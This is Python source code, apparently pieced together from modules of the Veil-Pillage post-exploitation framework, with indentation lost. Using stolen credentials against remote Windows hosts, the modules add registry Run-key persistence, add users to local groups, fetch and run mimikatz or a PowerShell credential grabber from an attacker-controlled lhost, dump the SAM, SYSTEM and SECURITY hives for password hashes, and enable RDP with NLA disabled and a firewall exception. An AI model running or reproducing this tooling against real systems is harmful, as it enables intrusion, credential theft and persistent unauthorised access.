regCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /f /v " + key_name + " /t REG_SZ /d \"C:\\Windows\\" + uploadName + "\""
# execute the sethc command and get the result
sethcResult = command_methods.executeResult(
target, username, password, regCommand, triggerMethod)
if sethcResult == "":
self.output += "[!] No result file, CurrentVersion\\Run registry command failed using creds '" + username + ":" + password + "' on : " + target + "\n"
elif "The operation completed successfully" in sethcResult:
self.output += "[*] CurrentVersion\\Run successfully set using creds '" + username + ":" + password + "' on : " + target + "\n"
# build our cleanup -> deleting this registry run value
cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v " + key_name + " /f"
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
for target in self.targets:
userToAdd = self.required_options["user"][0]
groupToAdd = self.required_options["localgroup"][0]
# command to add the user to the specified localgroup
groupAddCommand = "net localgroup " + groupToAdd + " " + userToAdd + " /add"
# execute the localgroup add command and get the result
groupAddResult = command_methods.executeResult(target, username, password, groupAddCommand, triggerMethod)
# check all of our results as appropriate
if groupAddResult == "":
self.output += (
"[!] No result file, localgroup add '"
+ userToAdd
+ " to "
+ groupToAdd
+ "' failed using creds '"
+ username
+ ":"
+ password
+ "' on : "
+ target
+ "\n"
)
elif "The command completed successfully" in groupAddResult:
self.output += (
"[*] User '"
+ userToAdd
+ " added to "
+ groupToAdd
+ "' successfully using creds '"
+ username
+ ":"
+ password
+ "' on "
+ target
+ "\n"
)
# cleanup -> delete the user from the system
cleanupCMD = "net localgroup " + groupToAdd + " " + userToAdd + " /delete"
self.cleanup += (
"executeCommand|"
+ target
+ "|"
+ username
+ "|"
+ password
+ "|"
+ cleanupCMD
+ "|"
+ triggerMethod
+ "\n"
)
else:
self.output += (
"[!] Localgroup add '"
+ userToAdd
+ " to "
+ groupToAdd
+ "' failed using creds '"
+ username
+ ":"
+ password
+ "' on : "
+ target
+ "\n"
)
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
lhost = self.required_options["lhost"][0]
delay = self.required_options["delay"][0]
out_file = self.required_options["out_file"][0]
# the temporary output file gpp-password will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
# let's keep track of ALL plaintext credentials found
allmsv, allkerberos, allwdigest, alltspkg = [], [], [], []
for target in self.targets:
print "\n [*] Executing mimikatz on "+target
# first, detect the architecture
archCommand = "echo %PROCESSOR_ARCHITECTURE%"
archResult = command_methods.executeResult(target, username, password, archCommand, triggerMethod)
# if there's a failure in this initial execution, go to the next target
if "error" in archResult:
self.output += "[!] Mimikatz failed for "+target+" : "+archResult+"\n"
continue
arch = "x86"
if "64" in archResult: arch = "x64"
exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file
# now time for mimikatz!
mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz"+arch+".exe"
# host the arch-correct mimikatz.exe and trigger it with the appropriate arguments
delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod=triggerMethod, exeArgs=exeArgs)
print "\n [*] Waiting "+delay+"s for Mimikatz to run..."
time.sleep(int(delay))
# grab the output file and delete it
out = smb.getFile(target, username, password, out_file, delete=True)
# parse the mimikatz output and append it to our globals
(msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
allmsv.extend(msv1_0)
allkerberos.extend(kerberos)
allwdigest.extend(wdigest)
alltspkg.extend(tspkg)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)
if out != "":
self.output += "[*] Mimikatz results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
else:
self.output += "[!] Mimikatz failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
# append the total mimikatz creds if we have any
if len(allmsv) > 0:
allmsv = sorted(set(allmsv))
self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
if len(allkerberos) > 0:
allkerberos = sorted(set(allkerberos))
self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n"
if len(allwdigest) > 0:
allwdigest = sorted(set(allwdigest))
self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n"
if len(alltspkg) > 0:
alltspkg = sorted(set(alltspkg))
self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
lhost = self.required_options["lhost"][0]
use_ssl = self.required_options["use_ssl"][0]
force_method = self.required_options["force_method"][0]
delay = self.required_options["delay"][0]
out_file = self.required_options["out_file"][0]
# let's keep track of all credentials found
allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], []
for target in self.targets:
powershellInstalled = False
# check if we're forcing a particular grab method
if force_method.lower() == "binary":
powershellInstalled = False
elif force_method.lower() == "powershell":
powershellInstalled = True
else:
# check if we have a functional Powershell installation
powershellCommand = "powershell.exe -c \"$a=42;$a\""
powershellResult = command_methods.executeResult(
target, username, password, powershellCommand, "wmis")
if powershellResult.strip() == "42": powershellInstalled = True
if powershellInstalled:
# do powersploit combined file of invoke-mimikatz and powerdump
print helpers.color("\n [*] Powershell installed on " + target)
self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"
# the temporary output file we will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
# path to the combined Invoke-Mimikatz/powerdump powershell script
secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"
# trigger the powershell download on just this target
delivery_methods.powershellHostTrigger(target,
username,
password,
secondStagePath,
lhost,
"",
triggerMethod="winexe",
outFile=out_file,
ssl=use_ssl,
noArch=True)
print "\n [*] Waiting " + delay + "s for Autograb to run..."
time.sleep(int(delay))
# grab the output file and delete it
out = smb.getFile(target,
username,
password,
out_file,
delete=True)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "autograb.txt",
out)
# parse the mimikatz output and append it to our globals
(msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
allmsv.extend(msv1_0)
allkerberos.extend(kerberos)
allwdigest.extend(wdigest)
alltspkg.extend(tspkg)
# parse the powerdump component
hashes = helpers.parseHashdump(out)
allhashes.extend(hashes)
if out != "":
self.output += "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
else:
self.output += "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
else:
# do reg.exe for hashdump and host/execute for mimikatz
print helpers.color("\n [!] Powershell not installed on " +
target,
warning=True)
print helpers.color(
"\n [*] Using reg.exe save method for hash dumping on " +
target)
self.output += "[!] Powershell not installed on " + target + "\n"
# reg.exe command to save off the hives
regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
# execute the registry save command
command_methods.executeCommand(target, username, password,
regSaveCommand, "wmis")
print helpers.color("\n [*] Dumping hashes on " + target)
# sleep for 5 seconds to let everything backup
time.sleep(5)
# grab all of the backed up files
systemFile = smb.getFile(target,
username,
password,
"C:\\Windows\\Temp\\system",
delete=False)
securityFile = smb.getFile(target,
username,
password,
"C:\\Windows\\Temp\\security",
delete=False)
samFile = smb.getFile(target,
username,
password,
"C:\\Windows\\Temp\\sam",
delete=False)
# more error-checking here?
if systemFile == "":
self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open('/tmp/system', 'w')
f.write(systemFile)
f.close()
if securityFile == "":
self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open('/tmp/security', 'w')
f.write(securityFile)
f.close()
if samFile == "":
self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open('/tmp/sam', 'w')
f.write(samFile)
f.close()
# get all the hashes from these hives
out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")
# save the output file off
saveLocation = helpers.saveModuleFile(self, target,
"creddump.txt", out)
self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n"
# save these off to the universal list
hashes = helpers.parseHashdump(out)
allhashes.extend(hashes)
# now, detect the architecture
archCommand = "echo %PROCESSOR_ARCHITECTURE%"
archResult = command_methods.executeResult(
target, username, password, archCommand, "wmis")
arch = "x86"
if "64" in archResult: arch = "x64"
# now time for ze mimikatz!
mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"
# the temporary output file we will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file
# host mimikatz.exe and trigger it ONLY on this particular machine
# so we can get the architecture correct
delivery_methods.hostTrigger(target,
username,
password,
mimikatzPath,
lhost,
triggerMethod="wmis",
exeArgs=exeArgs)
print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
time.sleep(int(delay))
# grab the output file and delete it
out = smb.getFile(target,
username,
password,
out_file,
delete=True)
# parse the mimikatz output and append it to our globals
(msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
allmsv.extend(msv1_0)
allkerberos.extend(kerberos)
allwdigest.extend(wdigest)
alltspkg.extend(tspkg)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt",
out)
if out != "":
self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
else:
self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
if len(allhashes) > 0:
allhashes = sorted(set(allhashes))
self.output += "[*] All unique hashes:\n\t" + "\n\t".join(
allhashes) + "\n"
if len(allmsv) > 0:
allmsv = sorted(set(allmsv))
self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
if len(allkerberos) > 0:
allkerberos = sorted(set(allkerberos))
self.output += "[*] All kerberos:\n\t" + "\n\t".join(
allkerberos) + "\n"
if len(allwdigest) > 0:
allwdigest = sorted(set(allwdigest))
self.output += "[*] All wdigest:\n\t" + "\n\t".join(
allwdigest) + "\n"
if len(alltspkg) > 0:
alltspkg = sorted(set(alltspkg))
self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self):
# assume single set of credentials (take the first one)
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
# enable RDP command
rdpCMD = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
# cleanup RDP command
rdpCleanupCMD = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f"
# Disable NLA command
nlaCMD = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f"
# Firewall exception command
firewallCMD = "netsh firewall set service type = remotedesktop mod = enable"
for target in self.targets:
# execute the RDP enable command and get the result
rdpResult = command_methods.executeResult(target, username,
password, rdpCMD,
triggerMethod)
if rdpResult == "":
self.output += "[!] No result file, RDP enable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
elif "The operation completed successfully" in rdpResult:
self.output += "[*] RDP successfully enabled using creds '" + username + ":" + password + "' on : " + target + "\n"
# our cleanup is to execute the RDP disable command
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + rdpCleanupCMD + "|" + triggerMethod + "\n"
# if we succeed here, keep going...
# execute the disable NLA command
nlaResult = command_methods.executeResult(
target, username, password, nlaCMD, triggerMethod)
if nlaResult == "":
self.output += "[!] No result file, NLA disable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
elif "The operation completed successfully" in nlaResult:
self.output += "[*] NLA successfully disabled using creds '" + username + ":" + password + "' on : " + target + "\n"
# more success, keep going again...
# execute the firewall exception command
firewallResult = command_methods.executeResult(
target, username, password, firewallCMD, triggerMethod)
if firewallResult == "":
self.output += "[!] No result file, firewall exeception failed using creds '" + username + ":" + password + "' on : " + target + "\n"
elif "executed successfully" in firewallResult:
self.output += "[*] Firewall exception successfully enabled using creds '" + username + ":" + password + "' on : " + target + "\n"
else:
self.output += "[!] Error in enabling firewall exception using creds '" + username + ":" + password + "' on : " + target + "\n"
else:
self.output += "[!] Error in disabling NLA using creds '" + username + ":" + password + "' on : " + target + "\n"
else:
self.output += "[!] Error in enabling RDP using creds '" + username + ":" + password + "' on : " + target + "\n"
